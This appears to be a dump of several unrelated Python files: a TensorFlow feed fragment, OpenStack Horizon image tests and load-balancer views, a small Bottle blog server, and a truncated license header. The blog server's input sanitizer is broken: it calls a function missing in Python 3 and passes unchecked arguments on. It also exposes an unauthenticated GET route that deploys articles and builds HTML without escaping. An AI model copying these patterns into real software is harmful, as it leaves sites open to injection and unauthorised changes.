for j, xij in enumerate(xi):
for k, xijk in enumerate(xij):
each = _get_word(xijk)
x[i, j, k] = each
x_mask[i, j, k] = True
for i, cxi in enumerate(CX):
for j, cxij in enumerate(cxi):
for k, cxijk in enumerate(cxij):
for l, cxijkl in enumerate(cxijk):
cx[i, j, k, l] = _get_char(cxijkl)
if l + 1 == config.max_word_size:
break
for i, qi in enumerate(batch.data['q']):
for j, qij in enumerate(qi):
q[i, j] = _get_word(qij)
q_mask[i, j] = True
for i, cqi in enumerate(batch.data['cq']):
for j, cqij in enumerate(cqi):
for k, cqijk in enumerate(cqij):
cq[i, j, k] = _get_char(cqijk)
if k + 1 == config.max_word_size:
break
return feed_dict
def get_multi_gpu_models(config):
models = []
for gpu_idx in range(config.num_gpus):
with tf.name_scope("model_{}".format(gpu_idx)) as scope, tf.device("/gpu:{}".format(gpu_idx)):
model = Model(config, scope)
tf.get_variable_scope().reuse_variables()
models.append(model)
return models
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from socket import timeout as socket_timeout
import tempfile
import unittest
from django.urls import reverse
import mock
import six
from horizon import exceptions
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.images import utils
from openstack_dashboard.test import helpers as test
INDEX_TEMPLATE = 'horizon/common/_data_table_view.html'
INDEX_URL = reverse('horizon:project:images:index')
CREATE_URL = reverse('horizon:project:images:images:create')
class BaseImagesTestCase(test.TestCase):
def setUp(self):
super(BaseImagesTestCase, self).setUp()
self.patcher = mock.patch.object(api.glance, 'image_list_detailed')
self.mock_image_list = self.patcher.start()
class ImagesAndSnapshotsTests(BaseImagesTestCase):
def test_index(self):
images = self.images.list()
self.mock_image_list.return_value = [images, False, False]
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, INDEX_TEMPLATE)
self.assertContains(res, 'help_text="Deleted images'
' are not recoverable."')
self.assertIn('images_table', res.context)
images_table = res.context['images_table']
images = images_table.data
self.assertEqual(len(images), 10)
row_actions = images_table.get_row_actions(images[0])
self.assertEqual(len(row_actions), 5)
row_actions = images_table.get_row_actions(images[1])
self.assertEqual(len(row_actions), 3)
self.assertNotIn('delete_image',
[a.name for a in row_actions])
row_actions = images_table.get_row_actions(images[2])
self.assertEqual(len(row_actions), 4)
self.mock_image_list.assert_called_once_with(test.IsHttpRequest(),
marker=None,
paginate=True,
sort_dir='asc',
sort_key='name',
reversed_order=False)
def test_index_no_images(self):
self.mock_image_list.return_value = [(), False, False]
res = self.client.get(INDEX_URL)
self.mock_image_list.assert_called_once_with(test.IsHttpRequest(),
marker=None,
paginate=True,
sort_dir='asc',
sort_key='name',
reversed_order=False)
self.assertTemplateUsed(res, INDEX_TEMPLATE)
self.assertContains(res, 'No items to display')
def test_index_error(self):
self.mock_image_list.side_effect = self.exceptions.glance
res = self.client.get(INDEX_URL)
self.mock_image_list.assert_called_once_with(test.IsHttpRequest(),
marker=None,
paginate=True,
sort_dir='asc',
sort_key='name',
reversed_order=False)
self.assertTemplateUsed(res, INDEX_TEMPLATE)
def test_snapshot_actions(self):
snapshots = self.snapshots.list()
self.mock_image_list.return_value = [snapshots, False, False]
res = self.client.get(INDEX_URL)
self.assertTemplateUsed(res, INDEX_TEMPLATE)
self.assertIn('images_table', res.context)
snaps = res.context['images_table']
self.assertEqual(len(snaps.get_rows()), 4)
row_actions = snaps.get_row_actions(snaps.data[0])
# first instance - status active, owned
self.assertEqual(len(row_actions), 5)
self.assertEqual(row_actions[0].verbose_name, u"Launch")
self.assertEqual(row_actions[1].verbose_name, u"Create Volume")
self.assertEqual(row_actions[2].verbose_name, u"Edit Image")
self.assertEqual(row_actions[3].verbose_name, u"Update Metadata")
self.assertEqual(row_actions[4].verbose_name, u"Delete Image")
row_actions = snaps.get_row_actions(snaps.data[1])
# second instance - status active, not owned
self.assertEqual(len(row_actions), 2)
self.assertEqual(row_actions[0].verbose_name, u"Launch")
self.assertEqual(row_actions[1].verbose_name, u"Create Volume")
row_actions = snaps.get_row_actions(snaps.data[2])
# third instance - status queued, only delete is available
self.assertEqual(len(row_actions), 1)
self.assertEqual(six.text_type(row_actions[0].verbose_name),
u"Delete Image")
self.assertEqual(str(row_actions[0]), "<DeleteImage: delete>")
self.mock_image_list.assert_called_once_with(test.IsHttpRequest(),
marker=None,
paginate=True,
sort_dir='asc',
sort_key='name',
reversed_order=False)
class ImagesAndSnapshotsUtilsTests(BaseImagesTestCase):
def test_list_image(self):
public_images = [image for image in self.images.list()
if image.status == 'active' and image.is_public]
private_images = [image for image in self.images.list()
if (image.status == 'active' and
not image.is_public)]
shared_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'shared')]
community_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'community')]
self.mock_image_list.side_effect = [
[public_images, False, False],
[private_images, False, False],
[community_images, False, False],
[shared_images, False, False]
]
image_calls = [
mock.call(test.IsHttpRequest(),
filters={'is_public': True, 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'visibility': 'community', 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
]
ret = utils.get_available_images(self.request, self.tenant.id)
expected_images = [image for image in self.images.list()
if (image.status == 'active' and
image.container_format not in ('ami', 'aki'))]
self.mock_image_list.assert_has_calls(image_calls)
self.assertEqual(len(expected_images), len(ret))
def test_list_image_using_cache(self):
public_images = [image for image in self.images.list()
if image.status == 'active' and image.is_public]
private_images = [image for image in self.images.list()
if (image.status == 'active' and
not image.is_public)]
community_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'community')]
shared_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'shared')]
self.mock_image_list.side_effect = [
[public_images, False, False],
[private_images, False, False],
[community_images, False, False],
[shared_images, False, False],
[private_images, False, False]
]
image_calls = [
mock.call(test.IsHttpRequest(),
filters={'is_public': True, 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'visibility': 'community', 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'property-owner_id': 'other-tenant',
'status': 'active'})
]
expected_images = [image for image in self.images.list()
if (image.status == 'active' and
image.container_format not in ('ari', 'aki'))]
images_cache = {}
ret = utils.get_available_images(self.request, self.tenant.id,
images_cache)
self.assertEqual(len(expected_images), len(ret))
self.assertEqual(
len(public_images),
len(images_cache['public_images']))
self.assertEqual(1, len(images_cache['images_by_project']))
self.assertEqual(
len(private_images),
len(images_cache['images_by_project'][self.tenant.id]))
self.assertEqual(
len(community_images),
len(images_cache['community_images']))
self.assertEqual(
len(shared_images),
len(images_cache['shared_images']))
ret = utils.get_available_images(self.request, self.tenant.id,
images_cache)
self.assertEqual(len(expected_images), len(ret))
# image list for other-tenant
ret = utils.get_available_images(self.request, 'other-tenant',
images_cache)
self.assertEqual(len(expected_images), len(ret))
self.assertEqual(
len(public_images),
len(images_cache['public_images']))
self.assertEqual(2, len(images_cache['images_by_project']))
self.assertEqual(
len(private_images),
len(images_cache['images_by_project']['other-tenant']))
self.mock_image_list.assert_has_calls(image_calls)
@mock.patch.object(exceptions, 'handle')
def test_list_image_error_public_image_list(self, mock_exception_handle):
private_images = [image for image in self.images.list()
if (image.status == 'active' and
not image.is_public)]
community_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'community')]
shared_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'shared')]
self.mock_image_list.side_effect = [
self.exceptions.glance,
[private_images, False, False],
[community_images, False, False],
[shared_images, False, False]
]
images_cache = {}
ret = utils.get_available_images(self.request, self.tenant.id,
images_cache)
image_calls = [
mock.call(test.IsHttpRequest(),
filters={'is_public': True, 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'status': 'active', 'property-owner_id': '1'}),
mock.call(test.IsHttpRequest(),
filters={'visibility': 'community', 'status': 'active'}),
mock.call(test.IsHttpRequest(),
filters={'visibility': 'shared', 'status': 'active'})
]
self.mock_image_list.assert_has_calls(image_calls)
mock_exception_handle.assert_called_once_with(
test.IsHttpRequest(),
"Unable to retrieve public images.")
expected_images = [image for image in private_images
if image.container_format not in ('ami', 'aki')]
self.assertEqual(len(expected_images), len(ret))
self.assertNotIn('public_images', images_cache)
self.assertEqual(1, len(images_cache['images_by_project']))
self.assertEqual(
len(private_images),
len(images_cache['images_by_project'][self.tenant.id]))
self.assertEqual(
len(community_images),
len(images_cache['community_images']))
self.assertEqual(
len(shared_images),
len(images_cache['shared_images']))
@mock.patch.object(exceptions, 'handle')
def test_list_image_error_private_image_list(self, mock_exception_handle):
public_images = [image for image in self.images.list()
if image.status == 'active' and image.is_public]
private_images = [image for image in self.images.list()
if (image.status == 'active' and
not image.is_public)]
community_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'community')]
shared_images = [image for image in self.imagesV2.list()
if (image.status == 'active' and
image.visibility == 'shared')]
self.mock_image_list.side_effect = [
[public_images, False, False],
self.exceptions.glance,
[community_images, False, False],
[shared_images, False, False],
[private_images, False, False]
]
images_cache = {}
ret = utils.get_available_images(self.request, self.tenant.id,
images_cache)
expected_images = [image for image in public_images
if image.container_format not in ('ami', 'aki')]
self.assertEqual(len(expected_images), len(ret))
self.assertEqual(
len(public_images),
len(images_cache['public_images']))
self.assertFalse(len(images_cache['images_by_project']))
self.assertEqual(
len(community_images),
len(images_cache['community_images']))
self.assertEqual(
len(shared_images),
len(images_cache['shared_images']))
ret = utils.get_available_images(self.request, self.tenant.id,
images_cache)
expected_images = [image for image in self.images.list()
if image.container_format not in ('ami', 'aki')]
self.assertEqual(len(expected_images), len(ret))
self.assertEqual(
len(public_images),
len(images_cache['public_images']))
self.assertEqual(1, len(images_cache['images_by_project']))
self.assertEqual(
len(private_images),
len(images_cache['images_by_project'][self.tenant.id]))
self.assertEqual(
len(community_images),
len(images_cache['community_images']))
self.assertEqual(
len(shared_images),
len(images_cache['shared_images']))
image_calls = [
mock.call(test.IsHttpRequest(),
filters={'status': 'active', 'is_public': True}),
mock.call(test.IsHttpRequest(),
filters={'status': 'active', 'property-owner_id': '1'}),
mock.call(test.IsHttpRequest(),
filters={'status': 'active', 'visibility': 'community'}),
mock.call(test.IsHttpRequest(),
filters={'status': 'active', 'visibility': 'shared'}),
mock.call(test.IsHttpRequest(),
filters={'status': 'active', 'property-owner_id': '1'})
]
self.mock_image_list.assert_has_calls(image_calls)
mock_exception_handle.assert_called_once_with(
test.IsHttpRequest(),
"Unable to retrieve images for the current project.")
class SeleniumTests(test.SeleniumTestCase):
@test.create_mocks({api.glance: ('image_list_detailed',)})
def test_modal_create_image_from_url(self):
driver = self.selenium
images = self.images.list()
self.mock_image_list_detailed.return_value = [images, False, False]
driver.get("%s%s" % (self.live_server_url, INDEX_URL))
# Open the modal menu
driver.find_element_by_id("images__action_create").click()
wait = self.ui.WebDriverWait(self.selenium, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: driver.find_element_by_id("id_disk_format"))
driver.find_element_by_xpath('//a[@data-select-value="url"]').click()
copyfrom = driver.find_element_by_id("id_image_url")
copyfrom.send_keys("http://www.test.com/test.iso")
formats = self.ui.Select(driver.find_element_by_id("id_disk_format"))
body = formats.first_selected_option
self.assertIn("ISO", body.text,
"ISO should be selected when the extension is *.iso")
self.assertEqual(3, self.mock_image_list_detailed.call_count)
self.mock_image_list_detailed.assert_has_calls([
mock.call(test.IsHttpRequest(), marker=None, paginate=True,
reversed_order=False, sort_dir='asc', sort_key='name'),
mock.call(test.IsHttpRequest(), filters={'disk_format': 'aki'}),
mock.call(test.IsHttpRequest(), filters={'disk_format': 'ari'}),
])
@unittest.skipIf(os.environ.get('SELENIUM_PHANTOMJS'),
"PhantomJS cannot test file upload widgets.")
@test.create_mocks({api.glance: ('image_list_detailed',)})
def test_modal_create_image_from_file(self):
driver = self.selenium
images = self.images.list()
self.mock_image_list_detailed.return_value = [images, False, False]
driver.get("%s%s" % (self.live_server_url, INDEX_URL))
# Open the modal menu
driver.find_element_by_id("images__action_create").click()
wait = self.ui.WebDriverWait(driver, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: driver.find_element_by_id("id_disk_format"))
driver.find_element_by_xpath('//a[@data-select-value="file"]').click()
with tempfile.NamedTemporaryFile() as tmp:
driver.find_element_by_id("id_image_file").send_keys(tmp.name)
formats = self.ui.Select(driver.find_element_by_id("id_disk_format"))
formats.select_by_visible_text('ISO - Optical Disk Image')
body = formats.first_selected_option
self.assertIn("ISO", body.text,
"ISO should be selected when the extension is *.iso")
self.assertEqual(3, self.mock_image_list_detailed.call_count)
self.mock_image_list_detailed.assert_has_calls([
mock.call(test.IsHttpRequest(), marker=None, paginate=True,
reversed_order=False, sort_dir='asc', sort_key='name'),
mock.call(test.IsHttpRequest(), filters={'disk_format': 'aki'}),
mock.call(test.IsHttpRequest(), filters={'disk_format': 'ari'}),
])
@test.create_mocks({api.glance: ('image_list_detailed',)})
def test_create_image_from_url(self):
driver = self.selenium
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
driver.get("%s%s" % (self.live_server_url, CREATE_URL))
wait = self.ui.WebDriverWait(driver, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: driver.find_element_by_id("id_disk_format"))
driver.find_element_by_xpath('//a[@data-select-value="url"]').click()
copyfrom = driver.find_element_by_id("id_image_url")
copyfrom.send_keys("http://www.test.com/test.iso")
formats = self.ui.Select(driver.find_element_by_id("id_disk_format"))
formats.select_by_visible_text('ISO - Optical Disk Image')
body = formats.first_selected_option
self.assertIn("ISO", body.text,
"ISO should be selected when the extension is *.iso")
self.assertEqual(2, self.mock_image_list_detailed.call_count)
self.mock_image_list_detailed.assert_has_calls([
mock.call(test.IsHttpRequest(), filters={'disk_format': 'aki'}),
mock.call(test.IsHttpRequest(), filters={'disk_format': 'ari'}),
])
@unittest.skipIf(os.environ.get('SELENIUM_PHANTOMJS'),
"PhantomJS cannot test file upload widgets.")
@test.create_mocks({api.glance: ('image_list_detailed',)})
def test_create_image_from_file(self):
driver = self.selenium
self.mock_image_list_detailed.return_value = [self.images.list(),
False, False]
driver.get("%s%s" % (self.live_server_url, CREATE_URL))
wait = self.ui.WebDriverWait(driver, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: driver.find_element_by_id("id_disk_format"))
driver.find_element_by_xpath('//a[@data-select-value="file"]').click()
with tempfile.NamedTemporaryFile() as tmp:
driver.find_element_by_id("id_image_file").send_keys(tmp.name)
formats = self.ui.Select(driver.find_element_by_id("id_disk_format"))
formats.select_by_visible_text('ISO - Optical Disk Image')
body = formats.first_selected_option
self.assertIn("ISO", body.text,
"ISO should be selected when the extension is *.iso")
self.assertEqual(2, self.mock_image_list_detailed.call_count)
self.mock_image_list_detailed.assert_has_calls([
mock.call(test.IsHttpRequest(), filters={'disk_format': 'aki'}),
mock.call(test.IsHttpRequest(), filters={'disk_format': 'ari'}),
])
|
|
#!/usr/bin/env python3
import functools
import os
import string
import urllib
from blog import Blog
from bottle import route, run, template, jinja2_view, url, Jinja2Template, response
from utilities import Log
# ----- INITIALIZE THE BLOG ----- #
# I'm not sure I'm happy with this; but making it all static doesn't seem much better.
blog_instance = Blog()
blog_instance.parseArticles()
blog_instance.parseStagedArticles()
# ----- SET UP THE TEMPLATE ENGINE ----- #
Jinja2Template.defaults = {
'url': url,
'blog': blog_instance,
}
# ----- SET UP HELPER FUNCTIONS ----- #
# Convenience function to set up views from the right directory
view = functools.partial(jinja2_view, template_lookup=['views'])
def sanitize(callback):
'''
Make sure all arguments to the function are in the whitelist
for characters, additionally unquotes the stringe.
:param callback: The function to sanitize.
'''
def sanitized_callback(*args, **kwargs):
#TODO: read from config? It'd be nice but I don't imagine it changing much.
whitelist = string.ascii_letters + string.digits + '_' + '-' + ' '
sanitized_args = []
sanitized_kwargs = {}
for arg in args:
if arg.__class__.__name__ == "str":
sanitized_args.append(urllib.unquote(arg))
for char in arg:
if char not in whitelist:
response.status = 303
response.set_header('Location', '/error')
Log("Invalid post character: %s" % (arg,))
return {}
for (key, value) in kwargs.items():
if value.__class__.__name__ == "str":
sanitized_kwargs[key] = urllib.unquote(value)
for char in value:
if char not in whitelist:
response.status = 303
response.set_header('Location', '/error')
Log("Invalid post character: %s" % (value,))
return {}
return callback(*args, **kwargs)
return sanitized_callback
def make_link(destination, text=None):
'''
Convenience function, generate the HTML for a link.
:param destination: the location of the link.
:param text: the alt text of the link. (default = destination)
'''
if not text:
text = destination
return "<a href=\"%s\">%s</a>" % (destination, text)
# ----- ROUTES ----- #
@route("/")
@sanitize
@view("articleList.tpl")
def root():
blog_instance.parseArticles()
recent_articles = blog_instance.getRecentArticles()
return {'article_list': recent_articles}
@route("/articles/<post>")
@sanitize
@view("basePage.tpl")
def article(post):
article = blog_instance.getArticle(post)
return {'content': article.body}
@route("/staging")
@sanitize
@view("articleList.tpl")
def searchStagedArticles(post=None):
blog_instance.parseStagedArticles()
return {'article_list': blog_instance.getStagedArticles()}
@route("/staging/<post>")
@sanitize
@view("basePage.tpl")
def viewStagedArticle(post):
staged_article = blog_instance.getStagedArticle(post)
return {'content': staged_article.body}
@route("/deploy/<post>")
@sanitize
@view("basePage.tpl")
def viewStagedArticle(post):
deploy_count = blog_instance.deploy(post)
if deploy_count > 0:
response.status = 303
response.set_header('Location', '/articles/' + post)
return {}
response.status = 303
response.set_header('Location', '/error')
return {}
@route("/<year:int>")
@route("/<year:int>/<month:int>")
@route("/<year:int>/<month:int>/<day:int>")
@sanitize
@view("articleList.tpl")
def searchByDate(year, month=None, day=None):
# Do the right thing no matter which parts of the date are given.
if day:
articles = blog_instance.articles_by_date[year][month][day].values()
elif month:
articles = []
for day in blog_instance.articles_by_date[year][month]:
articles += blog_instance.articles_by_date[year][month][day].values()
else:
articles = []
for month in blog_instance.articles_by_date[year]:
for day in blog_instance.articles_by_date[year][month]:
articles += blog_instance.articles_by_date[year][month][day].values()
return {"article_list": articles}
@route("/category/<category>")
@sanitize
@view("articleList.tpl")
def searchByCategory(category):
articles = blog_instance.getArticlesByCategory(category)
return {"article_list": articles}
@route("/category")
@sanitize
@view("basePage.tpl")
def searchtags():
content = [make_link("/category/" + tag, tag) + "<br>" for tag in blog_instance.getCategories()]
return {"content": "".join(content)}
@route("/tag/<tag>")
@sanitize
@view("articleList.tpl")
def searchByTag(tag):
articles = blog_instance.getArticlesByTag(tag)
return {"article_list": articles}
@route("/tag")
@sanitize
@view("basePage.tpl")
def searchTags():
content = [make_link("/tag/" + tag, tag) + "<br>" for tag in blog_instance.getTags()]
return {"content": "".join(content)}
@route("/error")
@sanitize
@view("basePage.tpl")
def searchTags():
return {"content": "Something happened. See server logs to find out what."}
def Run(host="localhost", port="80", config_path=None):
'''
Run the web server for the site specified by the routes in this module.
:param config_path: Optional additional or alternate configuration file.
'''
if config_path:
blog_instance.loadConfig(config_path)
run(host=host, port=port)
if __name__=="__main__":
Run()
|
|
# Copyright 2013, Big Switch Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import tabs
from horizon.utils import memoized
from horizon import workflows
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.loadbalancers \
import forms as project_forms
from openstack_dashboard.dashboards.project.loadbalancers \
import tables as project_tables
from openstack_dashboard.dashboards.project.loadbalancers \
import tabs as project_tabs
from openstack_dashboard.dashboards.project.loadbalancers import utils
from openstack_dashboard.dashboards.project.loadbalancers \
import workflows as project_workflows
class IndexView(tabs.TabbedTableView):
tab_group_class = (project_tabs.LoadBalancerTabs)
template_name = 'project/loadbalancers/details_tabs.html'
page_title = _("Load Balancer")
class AddPoolView(workflows.WorkflowView):
workflow_class = project_workflows.AddPool
class AddVipView(workflows.WorkflowView):
workflow_class = project_workflows.AddVip
def get_initial(self):
initial = super(AddVipView, self).get_initial()
initial['pool_id'] = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, initial['pool_id'])
initial['subnet'] = api.neutron.subnet_get(
self.request, pool.subnet_id).cidr
except Exception as e:
initial['subnet'] = ''
msg = _('Unable to retrieve pool subnet. %s') % e
exceptions.handle(self.request, msg)
return initial
class AddMemberView(workflows.WorkflowView):
workflow_class = project_workflows.AddMember
class AddMonitorView(workflows.WorkflowView):
workflow_class = project_workflows.AddMonitor
class PoolDetailsView(tabs.TabView):
tab_group_class = project_tabs.PoolDetailsTabs
template_name = 'project/loadbalancers/details_tabs.html'
page_title = _("Pool Details")
@memoized.memoized_method
def get_data(self):
pid = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, pid)
except Exception:
pool = []
exceptions.handle(self.request,
_('Unable to retrieve pool details.'))
else:
for monitor in pool.health_monitors:
display_name = utils.get_monitor_display_name(monitor)
setattr(monitor, 'display_name', display_name)
return pool
def get_context_data(self, **kwargs):
context = super(PoolDetailsView, self).get_context_data(**kwargs)
pool = self.get_data()
context['pool'] = pool
table = project_tables.PoolsTable(self.request)
context["url"] = self.get_redirect_url()
context["actions"] = table.render_row_actions(pool)
return context
def get_tabs(self, request, *args, **kwargs):
pool = self.get_data()
return self.tab_group_class(self.request, pool=pool, **kwargs)
@staticmethod
def get_redirect_url():
return reverse_lazy("horizon:project:loadbalancers:index")
class VipDetailsView(tabs.TabView):
tab_group_class = project_tabs.VipDetailsTabs
template_name = 'project/loadbalancers/details_tabs.html'
page_title = _("VIP Details")
class MemberDetailsView(tabs.TabView):
tab_group_class = project_tabs.MemberDetailsTabs
template_name = 'project/loadbalancers/details_tabs.html'
page_title = _("Member Details")
@memoized.memoized_method
def get_data(self):
mid = self.kwargs['member_id']
try:
return api.lbaas.member_get(self.request, mid)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve member details.'))
def get_context_data(self, **kwargs):
context = super(MemberDetailsView, self).get_context_data(**kwargs)
member = self.get_data()
context['member'] = member
table = project_tables.MembersTable(self.request)
context["url"] = self.get_redirect_url()
context["actions"] = table.render_row_actions(member)
return context
def get_tabs(self, request, *args, **kwargs):
member = self.get_data()
return self.tab_group_class(request, member=member, **kwargs)
@staticmethod
def get_redirect_url():
return reverse_lazy("horizon:project:loadbalancers:index")
class MonitorDetailsView(tabs.TabView):
tab_group_class = project_tabs.MonitorDetailsTabs
template_name = 'project/loadbalancers/details_tabs.html'
page_title = _("Monitor Details")
@memoized.memoized_method
def get_data(self):
mid = self.kwargs['monitor_id']
try:
return api.lbaas.pool_health_monitor_get(self.request, mid)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve monitor details.'))
def get_context_data(self, **kwargs):
context = super(MonitorDetailsView, self).get_context_data(**kwargs)
monitor = self.get_data()
context['monitor'] = monitor
table = project_tables.MonitorsTable(self.request)
context["url"] = self.get_redirect_url()
context["actions"] = table.render_row_actions(monitor)
return context
def get_tabs(self, request, *args, **kwargs):
monitor = self.get_data()
return self.tab_group_class(request, monitor=monitor, **kwargs)
@staticmethod
def get_redirect_url():
return reverse_lazy("horizon:project:loadbalancers:index")
class UpdatePoolView(forms.ModalFormView):
form_class = project_forms.UpdatePool
form_id = "update_pool_form"
modal_header = _("Edit Pool")
template_name = "project/loadbalancers/updatepool.html"
context_object_name = 'pool'
submit_label = _("Save Changes")
submit_url = "horizon:project:loadbalancers:updatepool"
success_url = reverse_lazy("horizon:project:loadbalancers:index")
page_title = _("Edit Pool")
def get_context_data(self, **kwargs):
context = super(UpdatePoolView, self).get_context_data(**kwargs)
context["pool_id"] = self.kwargs['pool_id']
args = (self.kwargs['pool_id'],)
context['submit_url'] = reverse(self.submit_url, args=args)
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
pool_id = self.kwargs['pool_id']
try:
return api.lbaas.pool_get(self.request, pool_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve pool details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
pool = self._get_object()
return {'name': pool['name'],
'pool_id': pool['id'],
'description': pool['description'],
'lb_method': pool['lb_method'],
'admin_state_up': pool['admin_state_up']}
class UpdateVipView(forms.ModalFormView):
form_class = project_forms.UpdateVip
form_id = "update_vip_form"
modal_header = _("Edit VIP")
template_name = "project/loadbalancers/updatevip.html"
context_object_name = 'vip'
submit_label = _("Save Changes")
submit_url = "horizon:project:loadbalancers:updatevip"
success_url = reverse_lazy("horizon:project:loadbalancers:index")
page_title = _("Edit VIP")
def get_context_data(self, **kwargs):
context = super(UpdateVipView, self).get_context_data(**kwargs)
context["vip_id"] = self.kwargs['vip_id']
args = (self.kwargs['vip_id'],)
context['submit_url'] = reverse(self.submit_url, args=args)
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
vip_id = self.kwargs['vip_id']
try:
return api.lbaas.vip_get(self.request, vip_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve VIP details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
vip = self._get_object()
persistence = getattr(vip, 'session_persistence', None)
if persistence:
stype = persistence['type']
if stype == 'APP_COOKIE':
cookie = persistence['cookie_name']
else:
cookie = ''
else:
stype = ''
cookie = ''
return {'name': vip['name'],
'vip_id': vip['id'],
'description': vip['description'],
'pool_id': vip['pool_id'],
'session_persistence': stype,
'cookie_name': cookie,
'connection_limit': vip['connection_limit'],
'admin_state_up': vip['admin_state_up']}
class UpdateMemberView(forms.ModalFormView):
form_class = project_forms.UpdateMember
form_id = "update_pool_form"
modal_header = _("Edit Member")
template_name = "project/loadbalancers/updatemember.html"
context_object_name = 'member'
submit_label = _("Save Changes")
submit_url = "horizon:project:loadbalancers:updatemember"
success_url = reverse_lazy("horizon:project:loadbalancers:index")
page_title = _("Edit Member")
def get_context_data(self, **kwargs):
context = super(UpdateMemberView, self).get_context_data(**kwargs)
context["member_id"] = self.kwargs['member_id']
args = (self.kwargs['member_id'],)
context['submit_url'] = reverse(self.submit_url, args=args)
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
member_id = self.kwargs['member_id']
try:
return api.lbaas.member_get(self.request, member_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve member details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
member = self._get_object()
return {'member_id': member['id'],
'pool_id': member['pool_id'],
'weight': member['weight'],
'admin_state_up': member['admin_state_up']}
class UpdateMonitorView(forms.ModalFormView):
form_class = project_forms.UpdateMonitor
form_id = "update_monitor_form"
modal_header = _("Edit Monitor")
template_name = "project/loadbalancers/updatemonitor.html"
context_object_name = 'monitor'
submit_label = _("Save Changes")
submit_url = "horizon:project:loadbalancers:updatemonitor"
success_url = reverse_lazy("horizon:project:loadbalancers:index")
page_title = _("Edit Monitor")
def get_context_data(self, **kwargs):
context = super(UpdateMonitorView, self).get_context_data(**kwargs)
context["monitor_id"] = self.kwargs['monitor_id']
args = (self.kwargs['monitor_id'],)
context['submit_url'] = reverse(self.submit_url, args=args)
return context
@memoized.memoized_method
def _get_object(self, *args, **kwargs):
monitor_id = self.kwargs['monitor_id']
try:
return api.lbaas.pool_health_monitor_get(self.request, monitor_id)
except Exception as e:
redirect = self.success_url
msg = _('Unable to retrieve health monitor details. %s') % e
exceptions.handle(self.request, msg, redirect=redirect)
def get_initial(self):
monitor = self._get_object()
return {'monitor_id': monitor['id'],
'delay': monitor['delay'],
'timeout': monitor['timeout'],
'max_retries': monitor['max_retries'],
'admin_state_up': monitor['admin_state_up']}
class AddPMAssociationView(workflows.WorkflowView):
workflow_class = project_workflows.AddPMAssociation
def get_initial(self):
initial = super(AddPMAssociationView, self).get_initial()
initial['pool_id'] = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, initial['pool_id'])
initial['pool_name'] = pool.name
initial['pool_monitors'] = pool.health_monitors
except Exception as e:
msg = _('Unable to retrieve pool. %s') % e
exceptions.handle(self.request, msg)
return initial
class DeletePMAssociationView(workflows.WorkflowView):
workflow_class = project_workflows.DeletePMAssociation
def get_initial(self):
initial = super(DeletePMAssociationView, self).get_initial()
initial['pool_id'] = self.kwargs['pool_id']
try:
pool = api.lbaas.pool_get(self.request, initial['pool_id'])
initial['pool_name'] = pool.name
initial['pool_monitors'] = pool.health_monitors
except Exception as e:
msg = _('Unable to retrieve pool. %s') % e
exceptions.handle(self.request, msg)
return initial
|
|
#!/usr/bin/env python
# Software License Agreement (BSD License)
#
# Copyright (c) 2017, Southwest Research Institute (SwRI)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
